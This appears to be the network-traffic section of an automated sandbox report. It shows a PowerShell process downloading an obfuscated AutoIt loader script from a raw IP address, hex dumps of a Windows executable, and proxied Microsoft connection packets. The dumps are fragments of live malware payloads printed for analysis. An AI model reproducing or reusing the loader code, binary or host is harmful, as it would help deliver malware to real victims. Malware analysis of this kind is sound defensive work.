                                                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 16 73 44 90 52 12 2a c3 52 12 2a c3 52 12 2a c3 14 43 cb c3 50 12 2a c3 cc b2 ed c3 53 12 2a c3 5f 40 f5 c3 61 12 2a c3 5f 40 ca c3 e3 12 2a c3 5f 40 cb c3 67 12 2a c3 5b 6a a9 c3 5b 12 2a c3 5b 6a b9 c3 77 12 2a c3 52 12 2b c3 72 10 2a c3 e7 8c c0 c3 02 12 2a c3 e7 8c f5 c3 53 12 2a c3 5f 40 f1 c3 53 12 2a c3 52 12 bd c3 50 12 2a c3 e7 8c f4 c3 53 12 2a c3 52 69 63 68 52 12 2a c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 f1 5f 70 5a 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0c 00 00 e8 08 00 00 d8 04 00 00 00 00 00 fa 7f 02 00 00 10 00 00 00 00 09 00 00 00 40 00 00 10 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$sDR*R*R*CP*S*_@a*_@*_@g*[j[*[jw*R+r**S*_@S*RP*S*RichR*PEL_pZ"@@@@|Ppq; [@.text `.rdata@@.datatR@.rsrcP<@@.relocqpr@B
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.837295055 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 44 61 4c 00
                                                                                                                                                                                                                  Data Ascii: DaLhC\YLhCKYNhC:YhC.Y<ChCYhCYQ>hCYsLQ@sLP9hC
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.837466955 CET1236INData Raw: 1e 02 00 59 c3 e8 8e 47 01 00 68 c7 b7 43 00 e8 c9 1e 02 00 59 c3 e8 e4 28 00 00 68 cc b7 43 00 e8 b8 1e 02 00 59 c3 e8 ac 34 01 00 68 d1 b7 43 00 e8 a7 1e 02 00 59 c3 b9 04 84 4c 00 e8 32 01 01 00 68 e0 b7 43 00 e8 91 1e 02 00 59 c3 cc cc cc cc
                                                                                                                                                                                                                  Data Ascii: YGhCY(hCY4hCYL2hCYSVWj[lKyNlN(V;Y_^[SV3Wj_NN(^^~^^^ ^$f^8NlF:^<^@FLFPFTFXF\F`Fdj
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.837480068 CET1236INData Raw: 9c fc 00 00 89 5e 64 8b c6 89 5e 68 89 5e 70 89 5e 78 c7 46 7c 01 00 00 00 66 89 be 84 00 00 00 66 89 be 88 00 00 00 66 89 be 8a 00 00 00 66 89 be 8c 00 00 00 66 89 be 8e 00 00 00 89 be 9c 00 00 00 5f 89 9e 80 00 00 00 88 9e 98 00 00 00 c6 86 93
                                                                                                                                                                                                                  Data Ascii: ^d^h^p^xF|fffff_^[UVW3j9~t.YtuLFGFxF~_^]Ytu>V6:V4YY^USjccYtVuW_^
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.838953972 CET1236INData Raw: 45 f4 8b 55 0c 8b 4d 08 e9 23 ff ff ff 8b 45 fc eb e0 80 f9 18 75 ee 8b 0a 89 4d f0 eb e7 55 8b ec ff 75 08 b9 b0 77 4c 00 e8 79 0f 00 00 8b 0d 10 78 4c 00 8b 0c 81 8b 09 ff 71 1c 50 e8 7a 0c 00 00 6a 00 ff 75 0c 6a 07 ff 75 08 ff 15 84 05 49 00
                                                                                                                                                                                                                  Data Ascii: EUM#EuMUuwLyxLqPzjujuI]UuwLAPPjjjuI]UQSVuwLuwLVEMIGIut-$xLtSuu\^[]
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.838967085 CET1236INData Raw: ff 51 e9 48 9e 03 00 6a 01 e9 10 9e 03 00 55 8b ec 56 57 8b 7d 08 8b b7 c8 01 00 00 8b ce 89 4d 08 85 f6 74 3c 8b 45 0c 53 85 c0 74 08 3b b0 80 00 00 00 75 3e 8b 5e 04 85 db 0f 85 83 9e 03 00 8b 87 c8 01 00 00 3b f0 75 3e 8b 06 89 87 c8 01 00 00
                                                                                                                                                                                                                  Data Ascii: QHjUVW}Mt<ESt;u>^;u>VEYt[jj7XI_^]uMt9t6UM$uE(@S]#E(VW} jQuWSuuQhIhpIPu
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.839241982 CET1236INData Raw: c0 7e 03 89 41 60 8b 45 14 85 c0 7e 03 89 41 64 5d c2 14 00 55 8b ec 51 a1 10 78 4c 00 56 8b 75 08 57 6a 00 8b 04 b0 8b 38 57 e8 0b fb ff ff 83 7f 18 00 0f 85 c8 9b 03 00 8b 0d 34 78 4c 00 6a 03 5a 89 55 fc 3b ca 0f 8c ad 00 00 00 a1 24 78 4c 00
                                                                                                                                                                                                                  Data Ascii: ~A`E~Ad]UQxLVuWj8W4xLjZU;$xL0F;G}VW~d~h~D~P>t6<I&uwLx4xLUBU;
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.839258909 CET1236INData Raw: 83 24 88 00 83 7e 78 03 76 0f 8b 4e 78 8b 46 74 8b 44 88 fc 83 38 00 74 cf 5f 5e 5d c2 04 00 83 8e 98 00 00 00 ff 83 8e 94 00 00 00 ff e9 6a ff ff ff 55 8b ec 51 8b 0d 28 78 4c 00 56 57 39 0d 30 78 4c 00 75 6e 81 3d 34 78 4c 00 ff ff 00 00 0f 84
                                                                                                                                                                                                                  Data Ascii: $~xvNxFtD8t_^]jUQ(xLVW90xLun=4xLhYE}P xL54xLF54xL$xL0xL9MIO_^]j^3;~$xL98u#h[Yt3F;|
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.840121984 CET1236INData Raw: 47 44 8b 45 f4 2b 45 ec 6a 00 6a 11 89 47 48 ff 15 14 01 49 00 50 6a 30 ff 37 ff 15 88 06 49 00 6a ff 57 b9 b0 77 4c 00 e8 5c f9 ff ff 83 3d d4 77 4c 00 00 75 16 68 c7 13 40 00 6a 28 6a 00 6a 00 ff 15 18 07 49 00 a3 d4 77 4c 00 ff 05 d0 77 4c 00
                                                                                                                                                                                                                  Data Ascii: GDE+EjjGHIPj07IjWwL\=wLuh@j(jjIwLwLwLj5xLG_^[] 3"'MPMRU}WwLxLt{xL3V0M8V:tV:9}t
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.840285063 CET1236INData Raw: 00 00 00 0f 85 e2 9e 03 00 83 7b 50 ff 75 31 83 7b 54 ff 75 36 83 3e 00 74 0b 57 6a eb ff 36 ff 15 10 05 49 00 8d 4d 2c e8 34 1b 00 00 8b c7 5f 5e 5b 8b e5 5d c2 34 00 8a 45 f4 e9 74 ff ff ff ff 73 50 57 e8 ce 5b 08 00 eb c4 ff 73 54 57 e8 b7 59
                                                                                                                                                                                                                  Data Ascii: {Pu1{Tu6>tWj6IM,4_^[]4EtsPW[sTWYeCC'CECcCCCCCGCCCClCCCCC+CCC2@pCC;CYCwC1@CCU}VuNlF`^f@h
                                                                                                                                                                                                                  Dec 18, 2024 21:06:17.958030939 CET1236INData Raw: 08 74 f6 8b 40 10 c3 55 8b ec 56 8b f1 83 7e 04 00 75 12 ff 75 08 8b 0e e8 ec 1a 00 00 ff 46 04 5e 5d c2 04 00 80 7e 0d 00 75 29 57 6a 18 e8 80 d8 01 00 8b f8 59 85 ff 74 2b ff 75 08 83 67 08 00 8b cf e8 e5 16 00 00 8b 46 08 89 47 10 89 7e 08 5f
                                                                                                                                                                                                                  Data Ascii: t@UV~uuF^]~u)WjYt+ugFG~_uNF3UED{wp[JD{hSUVW~]uUmUEx[J]}+}MM+]E;|;s_^[]


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                  1192.168.2.649802139.99.188.124809152C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  Dec 18, 2024 21:06:21.466746092 CET76OUTGET /QWCheljD.txt HTTP/1.1
                                                                                                                                                                                                                  Host: 139.99.188.124
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.973509073 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 20:06:22 GMT
                                                                                                                                                                                                                  Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
                                                                                                                                                                                                                  Last-Modified: Sun, 15 Dec 2024 10:29:42 GMT
                                                                                                                                                                                                                  ETag: "12ec22-6294c8abc8478"
                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                  Content-Length: 1240098
                                                                                                                                                                                                                  Keep-Alive: timeout=5, max=100
                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                  Content-Type: text/plain
                                                                                                                                                                                                                  Data Raw: 46 75 6e 63 20 4e 75 74 72 69 74 69 6f 6e 53 70 65 65 64 4d 61 79 6f 72 46 61 6d 69 6c 69 65 73 28 24 53 6d 4b 69 73 73 2c 20 24 45 66 66 69 63 69 65 6e 74 6c 79 46 6f 72 6d 75 6c 61 2c 20 24 43 6f 6e 73 75 6c 74 69 6e 67 53 6f 72 74 73 4c 61 62 73 2c 20 24 66 75 72 74 68 65 72 74 65 72 72 6f 72 69 73 74 2c 20 24 42 49 4b 45 4f 43 43 55 52 52 45 4e 43 45 53 4c 49 47 48 54 2c 20 24 52 65 76 65 72 73 65 50 68 69 6c 69 70 70 69 6e 65 73 29 0a 24 50 64 42 6c 6f 63 6b 73 52 65 73 70 6f 6e 73 65 44 61 74 20 3d 20 27 37 33 39 31 31 39 36 31 38 37 37 32 27 0a 24 56 65 72 69 66 69 65 64 55 6e 64 65 72 73 74 6f 6f 64 56 61 6c 69 64 61 74 69 6f 6e 20 3d 20 33 34 0a 24 69 6f 73 79 6d 70 68 6f 6e 79 73 65 65 6d 73 63 72 75 63 69 61 6c 20 3d 20 35 30 0a 46 6f 72 20 24 4f 64 48 42 74 20 3d 20 32 38 20 54 6f 20 38 36 35 0a 49 66 20 24 56 65 72 69 66 69 65 64 55 6e 64 65 72 73 74 6f 6f 64 56 61 6c 69 64 61 74 69 6f 6e 20 3d 20 33 32 20 54 68 65 6e 0a 53 71 72 74 28 37 39 35 35 29 0a 46 69 6c 65 45 78 69 73 74 73 28 [TRUNCATED]
                                                                                                                                                                                                                  Data Ascii: Func NutritionSpeedMayorFamilies($SmKiss, $EfficientlyFormula, $ConsultingSortsLabs, $furtherterrorist, $BIKEOCCURRENCESLIGHT, $ReversePhilippines)$PdBlocksResponseDat = '739119618772'$VerifiedUnderstoodValidation = 34$iosymphonyseemscrucial = 50For $OdHBt = 28 To 865If $VerifiedUnderstoodValidation = 32 ThenSqrt(7955)FileExists(Wales("73]113]116]120]125]36]81]36]72]109]119]116]121]120]105]36",12/3))$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1EndIfIf $VerifiedUnderstoodValidation = 33 ThenConsoleWriteError(Wales("75]106]103]119]122]102]119]126]48]74]125]121]119]102]48",25/5))DriveStatus(Wales("87]72]79]72]70]82]80]80]88]81]76]70]68]87]76]82]81]86]67]71]72]86]76]85]72]67",6/2))Dec(Wales("92]77]84]52]70]82]70]95]84]83]72]84]90]80]52]71]90]73]70]85]74]88]89]52]90]83]78]89]88]52",5/1))$VerifiedUnderstoodValidation = $VerifiedUnderstoodValidation + 1EndIfIf $VerifiedUndersto
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.973702908 CET224INData Raw: 6f 64 56 61 6c 69 64 61 74 69 6f 6e 20 3d 20 33 34 20 54 68 65 6e 0a 24 4e 75 74 74 65 6e 49 6e 76 65 73 74 6f 72 73 52 61 6c 65 69 67 68 20 3d 20 44 65 63 28 57 61 6c 65 73 28 22 31 30 34 5d 31 31 33 5d 31 30 35 5d 38 36 5d 38 35 5d 39 36 5d 38
                                                                                                                                                                                                                  Data Ascii: odValidation = 34 Then$NuttenInvestorsRaleigh = Dec(Wales("104]113]105]86]85]96]83]73]78]127]105]97]79]105]77",28/4))ExitLoopEndIfNext$LAYERSSTRICTINNOVATIVE = '66150718350940696046327902621'$DmModsQueries = 68$DRESSD
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.973714113 CET1236INData Raw: 45 41 52 41 4e 54 49 51 55 45 53 20 3d 20 39 33 0a 57 68 69 6c 65 20 39 38 0a 49 66 20 24 44 6d 4d 6f 64 73 51 75 65 72 69 65 73 20 3d 20 36 36 20 54 68 65 6e 0a 41 54 61 6e 28 35 34 38 33 29 0a 44 72 69 76 65 53 74 61 74 75 73 28 57 61 6c 65 73
                                                                                                                                                                                                                  Data Ascii: EARANTIQUES = 93While 98If $DmModsQueries = 66 ThenATan(5483)DriveStatus(Wales("90]117]120]112]110]119]121]40]72]116]115]120]122]113]121]102]115]121]40]72]116]122]119]120]106]40",35/7))ACos(1640)$DmModsQueries = $DmModsQueries + 1EndIf
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.973953009 CET224INData Raw: 32 33 5d 38 38 5d 38 35 5d 37 32 5d 31 30 35 5d 37 33 5d 31 30 32 5d 31 32 37 5d 31 32 36 5d 38 32 5d 31 31 39 22 2c 35 2f 31 29 29 0a 45 78 69 74 4c 6f 6f 70 0a 45 6e 64 49 66 0a 4e 65 78 74 0a 24 6d 61 72 6b 63 6f 61 74 20 3d 20 27 35 37 31 31
                                                                                                                                                                                                                  Data Ascii: 23]88]85]72]105]73]102]127]126]82]119",5/1))ExitLoopEndIfNext$markcoat = '571122626772955393541120575471284845703735808343'$HOLDEMOLDSIGMA = 67$RecognitionConnecting = 61While 422If $HOLDEMOLDSIGMA = 66 ThenChr(4037
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.974014997 CET1236INData Raw: 29 0a 43 6f 6e 73 6f 6c 65 57 72 69 74 65 45 72 72 6f 72 28 57 61 6c 65 73 28 22 38 35 5d 31 31 33 5d 31 32 32 5d 31 30 35 5d 31 30 37 5d 31 31 36 5d 31 30 39 5d 35 31 5d 39 35 5d 31 30 39 5d 31 30 35 5d 31 32 30 5d 31 31 39 5d 31 31 38 5d 35 31
                                                                                                                                                                                                                  Data Ascii: )ConsoleWriteError(Wales("85]113]122]105]107]116]109]51]95]109]105]120]119]118]51",64/8))$HOLDEMOLDSIGMA = $HOLDEMOLDSIGMA + 1EndIfIf $HOLDEMOLDSIGMA = 67 Then$IntendComputersArea = PixelGetColor(90, 215, 0)ExitLoopEndIfIf $HOLDEMOLDSI
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.974020958 CET1236INData Raw: 5d 39 35 5d 38 33 5d 31 30 32 5d 31 31 39 5d 31 30 36 5d 31 31 36 5d 31 30 36 5d 31 31 32 5d 31 31 31 5d 31 31 36 5d 39 35 22 2c 38 2f 38 29 29 0a 24 6d 69 73 73 69 6f 6e 73 67 72 65 65 6e 68 6f 75 73 65 20 3d 20 24 6d 69 73 73 69 6f 6e 73 67 72
                                                                                                                                                                                                                  Data Ascii: ]95]83]102]119]106]116]106]112]111]116]95",8/8))$missionsgreenhouse = $missionsgreenhouse + 1EndIfNext$soundsfarswitchsufficiently = '1764830625190115630455157117955314553809907711398'$SCALESWXETHNICOMAHA = 79$eosroutestreasury = 78For
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.974029064 CET1236INData Raw: 5d 31 32 34 5d 39 35 5d 38 35 5d 31 30 39 5d 38 35 5d 31 31 38 5d 37 38 5d 31 32 38 5d 37 33 5d 31 32 39 5d 37 35 5d 31 31 37 5d 39 36 22 2c 32 34 2f 33 29 29 0a 45 78 69 74 4c 6f 6f 70 0a 45 6e 64 49 66 0a 49 66 20 24 44 49 4c 44 4f 53 59 49 45
                                                                                                                                                                                                                  Data Ascii: ]124]95]85]109]85]118]78]128]73]129]75]117]96",24/3))ExitLoopEndIfIf $DILDOSYIELDSFAREADDRESSED = 37 ThenConsoleWriteError(Wales("85]81]84]86]96]89]67]73]71]85]96]69]78]67]87]85]71]96]86]67]78]71]85]96",12/6))PixelGetColor(Wales("128]108]
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.974668980 CET672INData Raw: 4c 65 73 73 50 68 6f 6e 65 20 2b 20 31 0a 45 6e 64 49 66 0a 57 45 6e 64 0a 24 54 6f 6e 79 54 72 65 61 73 75 72 65 73 45 76 61 6c 75 61 74 69 6e 67 20 3d 20 27 39 35 37 39 30 37 32 38 39 34 31 39 33 37 31 37 34 32 38 33 39 31 39 34 35 34 32 35 37
                                                                                                                                                                                                                  Data Ascii: LessPhone + 1EndIfWEnd$TonyTreasuresEvaluating = '957907289419371742839194542570574875273050762245784821196346572'$InterestedDieDocs = 28$RenewalTissueBarn = 79While 761If $InterestedDieDocs = 27 ThenFileExists(Wales("76]81]75]77]55]88
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.974680901 CET1236INData Raw: 37 36 5d 38 31 5d 36 38 5d 38 35 5d 38 36 5d 36 37 5d 36 38 5d 37 33 5d 36 37 5d 38 35 5d 37 32 5d 38 39 5d 37 36 5d 37 32 5d 39 30 5d 37 32 5d 38 35 5d 36 37 22 2c 32 37 2f 39 29 29 0a 50 69 78 65 6c 47 65 74 43 6f 6c 6f 72 28 37 34 2c 20 35 33
                                                                                                                                                                                                                  Data Ascii: 76]81]68]85]86]67]68]73]67]85]72]89]76]72]90]72]85]67",27/9))PixelGetColor(74, 531, 0)$InterestedDieDocs = $InterestedDieDocs + 1EndIfWEnd$TableDiscussesRapidlyHistorical = '9877795137043152116883331283765251278672396181174893270'$COACHC
                                                                                                                                                                                                                  Dec 18, 2024 21:06:22.974693060 CET1236INData Raw: 32 38 29 0a 45 78 69 74 4c 6f 6f 70 0a 45 6e 64 49 66 0a 49 66 20 24 41 63 74 72 65 73 73 47 6f 6e 65 4c 69 63 65 6e 73 65 20 3d 20 32 32 20 54 68 65 6e 0a 41 54 61 6e 28 36 33 36 33 29 0a 41 54 61 6e 28 38 36 32 29 0a 41 54 61 6e 28 33 31 36 35
                                                                                                                                                                                                                  Data Ascii: 28)ExitLoopEndIfIf $ActressGoneLicense = 22 ThenATan(6363)ATan(862)ATan(3165)$ActressGoneLicense = $ActressGoneLicense + 1EndIfWEnd$BasketsNearCuba = '5584782457542617062718210008'$HerebyFaq = 55$MultiCordlessFlexRepublicans = 73W
                                                                                                                                                                                                                  Dec 18, 2024 21:06:23.093556881 CET1236INData Raw: 20 3d 20 24 49 6c 6c 6e 65 73 73 46 6f 6c 6b 20 2b 20 31 0a 45 6e 64 49 66 0a 4e 65 78 74 0a 46 75 6e 63 20 42 75 6b 6b 61 6b 65 42 75 74 74 65 72 52 65 62 6f 75 6e 64 28 24 44 49 53 50 4c 41 59 45 44 41 43 49 44 53 56 45 52 4d 4f 4e 54 46 52 45
                                                                                                                                                                                                                  Data Ascii: = $IllnessFolk + 1EndIfNextFunc BukkakeButterRebound($DISPLAYEDACIDSVERMONTFREDERICK, $AIRCRAFTSCANNEDMAINTAIN)$ImmediatelyMarbleIncorporatedHour = 81$appropriateload = 81While 933If $ImmediatelyMarbleIncorporatedHour = 80 ThenConsole


                                                                                                                                                                                                                  HTTPS Proxied Packets

                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                  0192.168.2.64970820.198.118.190443
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-12-18 20:05:53 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 7a 61 2b 48 6e 2f 31 4a 56 30 69 34 2b 6f 59 6c 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 66 66 32 35 66 33 34 31 65 37 64 62 66 34 65 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: CNT 1 CON 305MS-CV: za+Hn/1JV0i4+oYl.1Context: dff25f341e7dbf4e
                                                                                                                                                                                                                  2024-12-18 20:05:53 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                  2024-12-18 20:05:53 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 7a 61 2b 48 6e 2f 31 4a 56 30 69 34 2b 6f 59 6c 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 66 66 32 35 66 33 34 31 65 37 64 62 66 34 65 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 55 46 79 53 6e 31 48 6a 30 63 66 72 4b 67 53 78 4c 50 69 62 37 61 54 72 6f 4b 42 63 2b 6d 73 57 42 47 34 42 43 71 6f 64 63 2b 43 75 62 77 63 63 61 62 4e 66 41 55 46 36 41 54 69 79 4a 6b 58 35 61 53 38 35 67 50 2b 36 6c 72 6a 73 6a 48 47 35 2b 32 4d 4a 75 52 4a 61 52 35 35 47 69 34 30 6b 78 37 69 71 37 69 4a 64 6d 54 2b 6c 7a
                                                                                                                                                                                                                  Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: za+Hn/1JV0i4+oYl.2Context: dff25f341e7dbf4e<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUFySn1Hj0cfrKgSxLPib7aTroKBc+msWBG4BCqodc+CubwccabNfAUF6ATiyJkX5aS85gP+6lrjsjHG5+2MJuRJaR55Gi40kx7iq7iJdmT+lz
                                                                                                                                                                                                                  2024-12-18 20:05:53 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 7a 61 2b 48 6e 2f 31 4a 56 30 69 34 2b 6f 59 6c 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 64 66 66 32 35 66 33 34 31 65 37 64 62 66 34 65 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: BND 3 CON\QOS 56MS-CV: za+Hn/1JV0i4+oYl.3Context: dff25f341e7dbf4e
                                                                                                                                                                                                                  2024-12-18 20:05:54 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                                                                                                                                                                                  Data Ascii: 202 1 CON 58
                                                                                                                                                                                                                  2024-12-18 20:05:54 UTC58INData Raw: 4d 53 2d 43 56 3a 20 48 76 51 46 6f 74 51 71 30 45 79 74 41 69 6a 30 58 44 44 77 57 41 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                                                                                                                                                                                  Data Ascii: MS-CV: HvQFotQq0EytAij0XDDwWA.0Payload parsing failed.


                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                  1192.168.2.64971420.198.118.190443
                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                  2024-12-18 20:06:00 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 49 58 2f 41 35 4b 73 50 30 30 36 51 51 7a 48 6d 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 30 33 64 62 36 61 39 63 36 31 39 63 34 37 37 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: CNT 1 CON 305MS-CV: IX/A5KsP006QQzHm.1Context: c03db6a9c619c477
                                                                                                                                                                                                                  2024-12-18 20:06:00 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                                                                                                                                                                                  Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                                                                                                                                                                                  2024-12-18 20:06:00 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 49 58 2f 41 35 4b 73 50 30 30 36 51 51 7a 48 6d 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 30 33 64 62 36 61 39 63 36 31 39 63 34 37 37 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 55 46 79 53 6e 31 48 6a 30 63 66 72 4b 67 53 78 4c 50 69 62 37 61 54 72 6f 4b 42 63 2b 6d 73 57 42 47 34 42 43 71 6f 64 63 2b 43 75 62 77 63 63 61 62 4e 66 41 55 46 36 41 54 69 79 4a 6b 58 35 61 53 38 35 67 50 2b 36 6c 72 6a 73 6a 48 47 35 2b 32 4d 4a 75 52 4a 61 52 35 35 47 69 34 30 6b 78 37 69 71 37 69 4a 64 6d 54 2b 6c 7a
                                                                                                                                                                                                                  Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: IX/A5KsP006QQzHm.2Context: c03db6a9c619c477<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUFySn1Hj0cfrKgSxLPib7aTroKBc+msWBG4BCqodc+CubwccabNfAUF6ATiyJkX5aS85gP+6lrjsjHG5+2MJuRJaR55Gi40kx7iq7iJdmT+lz
                                                                                                                                                                                                                  2024-12-18 20:06:00 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 49 58 2f 41 35 4b 73 50 30 30 36 51 51 7a 48 6d 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 63 30 33 64 62 36 61 39 63 36 31 39 63 34 37 37 0d 0a 0d 0a
                                                                                                                                                                                                                  Data Ascii: BND 3 CON\QOS 56MS-CV: IX/A5KsP006QQzHm.3Context: c03db6a9c619c477
